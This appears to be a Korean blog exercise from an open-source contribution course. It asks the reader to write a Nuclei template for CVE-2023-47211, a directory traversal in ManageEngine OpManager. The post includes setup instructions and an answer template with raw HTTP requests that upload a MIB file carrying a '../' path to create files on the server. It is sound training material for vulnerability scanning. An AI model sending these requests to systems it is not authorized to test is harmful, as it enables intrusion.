방명록
- Nuclei Templates 실전문제 - CVE-2023-472112024년 05월 12일 10시 31분 58초에 업로드 된 글입니다.작성자: IIIIIIIIIIIIIIIIIIIIl
아래 문제 내용에서 취약점 원인을 찾고 Nuclei Templates을 작성하시오.
취약점 소개
A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.
환경 구축하기
Installing on Windows
Prerequisites: Check the system requirements for OpManager before you begin the installation.
- Download OpManager for Windows.
- Learn how to install OpManager Essential edition here
- Learn how to install OpManager Enterprise edition here
Installing OpManager on Linux
Prerequisites: Check the system requirements for OpManager before you begin the installation.
- Learn how to install OpManager Essential edition hereLearn how to install OpManager Enterprise edition here
Uninstalling OpManager
- To uninstall OpManager from a Windows machine, try Start > Programs > ManageEngine OpManager > Uninstall OpManager.
- To uninstall OpManager from a Linux machine, execute the command ./uninstaller.bin from the /bin/_uninst directory under OpManager installation.
Installing Applications Monitoring plug-in
- Check your build number and download the Application Monitoring plug-in here.
- Shutdown OpManager before installing the plug-in
- Double click OpManager's APM plug-in exe file. (You have to install APM plug-in in OpManager server only)
- Follow the on-screen instructions to complete the installation process.
- Click Finish. The plug-in has been installed successfully.
Uninstalling Applications Monitoring plug-in
- From the Control Panel open Add/Remove Programs
- Select ManageEngine APM plug-in and click Change/Remove button.
- Click Yes to confirm to uninstall the plug-in.
- Click Finish. The plug-in has been uninstalled successfully.
Upgrading OpManager
Different types of OpManager upgrades are periodically released. These include Service Packs, Upgrade Packs, and Migration Packs. Download the latest OpManager release here
정답 템플릿 ( 시도해보고 잘 모르겠으면 보세요)
id: CVE-2023-47211 info: name: ManageEngine OpManager - Directory Traversal author: gy741 severity: high description: | A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2023-1851 - https://nvd.nist.gov/vuln/detail/CVE-2023-47211 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 8.6 cve-id: CVE-2023-47211 cwe-id: CWE-22 epss-score: 0.000610000 epss-percentile: 0.238320000 cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"OpManager Plus" tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi http: - raw: - | POST /two_factor_auth HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded j_username={{username}}&j_password={{password}} - | POST /client/api/json/mibbrowser/uploadMib HTTP/1.1 Host: {{Hostname}} X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}} Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262 -----------------------------372334936941313273904263503262 Content-Disposition: form-data; name="mibFile"; filename="karas.txt" Content-Type: text/plain ../images/karas DEFINITIONS ::= BEGIN IMPORTS enterprises FROM RFC1155-SMI; microsoft OBJECT IDENTIFIER ::= { enterprises 311 } software OBJECT IDENTIFIER ::= { microsoft 1 } systems OBJECT IDENTIFIER ::= { software 1 } os OBJECT IDENTIFIER ::= { systems 3 } windowsNT OBJECT IDENTIFIER ::= { os 1 } windows OBJECT IDENTIFIER ::= { os 2 } workstation OBJECT IDENTIFIER ::= { windowsNT 1 } server OBJECT IDENTIFIER ::= { windowsNT 2 } dc OBJECT IDENTIFIER ::= { windowsNT 3 } END -----------------------------372334936941313273904263503262-- - | POST /client/api/json/mibbrowser/uploadMib HTTP/1.1 Host: {{Hostname}} X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}} Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262 -----------------------------372334936941313273904263503262 Content-Disposition: form-data; name="mibFile"; filename="karas.txt" Content-Type: text/plain ../images/karas DEFINITIONS ::= BEGIN IMPORTS enterprises FROM RFC1155-SMI; microsoft OBJECT IDENTIFIER ::= { enterprises 311 } software OBJECT IDENTIFIER ::= { microsoft 1 } systems OBJECT IDENTIFIER ::= { software 1 } os OBJECT IDENTIFIER ::= { systems 3 } windowsNT OBJECT IDENTIFIER ::= { os 1 } windows OBJECT IDENTIFIER ::= { os 2 } workstation OBJECT IDENTIFIER ::= { windowsNT 1 } server OBJECT IDENTIFIER ::= { windowsNT 2 } dc OBJECT IDENTIFIER ::= { windowsNT 3 } END -----------------------------372334936941313273904263503262-- host-redirects: true max-redirects: 3 matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "application/json")' - 'contains(body, "MIBFile with same name already exists")' condition: and extractors: - type: regex name: x_zcsrf_token group: 1 part: header regex: - 'Set-Cookie: opmcsrfcookie=([^;]{50,})' internal: true'오픈소스 컨트리뷰션 양성 과정 > Project Discovery' 카테고리의 다른 글
(2) Subfinder API 환경 구성 - BeVigil (0) 2024.05.14 (1) Subfinder API 환경 구성 알아보기 (0) 2024.05.12 Nuclei Templates 실전문제 - CVE-2023-6977 (0) 2024.05.12 Nuclei Templates 실전문제 - CVE-2023-30258 (0) 2024.05.11 Nuclei Templates 연습문제 - level 2 (0) 2024.05.08 다음글이 없습니다.이전글이 없습니다.댓글